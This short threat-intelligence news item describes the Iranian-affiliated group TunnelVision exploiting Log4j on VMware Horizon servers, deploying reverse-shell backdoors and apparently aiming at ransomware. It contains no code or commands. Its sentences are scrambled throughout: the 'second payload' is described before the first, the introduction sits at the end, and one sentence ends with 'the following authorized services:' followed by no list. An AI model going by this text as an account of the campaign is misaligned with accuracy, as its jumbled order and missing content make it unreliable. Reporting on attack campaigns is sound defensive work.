The second payload, which threat actors have primarily employed in recent attempts, is a modified version of a one-line PowerShell script published on GitHub. The first payload is a zip file containing an executable called “InteropServices.exe.” This executable contains an obfuscated reverse shell beaconing to “microsoft-updateservercf.”
TunnelVision was seen deploying two custom reverse shell backdoors onto compromised PCs by the researchers. While the PowerShell commands assist adversaries in collecting outputs via a webhook, all connections make use of one of the following authorized services: The exploit procedure is identical to that described by the NHS in a January 2022 security bulletin, and it entails the direct execution of PowerShell commands and the activation of reverse shells via the Tomcat service. The target deployments are VMware Horizon servers that are vulnerable to Log4j issues that are trivial to exploit. TunnelVision initially targeted CVE-2018-13379 (Fortinet FortiOS), a series of Microsoft Exchange Proxy Shell vulnerabilities, and has recently shifted its focus to the Log4Shell attack.
TunnelVision’s goal appears to be the distribution of ransomware, indicating that the gang is not just interested in cyber espionage but also in data destruction and operational disruption. Tunnelling is the process of obfuscating or even concealing data flow during its transmission. Cyber security experts who have been monitoring the activity picked the moniker due to the group’s significant use on tunnelling tools, which enable them to conceal their operations from detection. TunnelVision, an Iranian-affiliated hacker group, was detected attacking Log4j on VMware Horizon servers to compromise corporate networks in the Middle East and the United States.
0 kommentar(er)
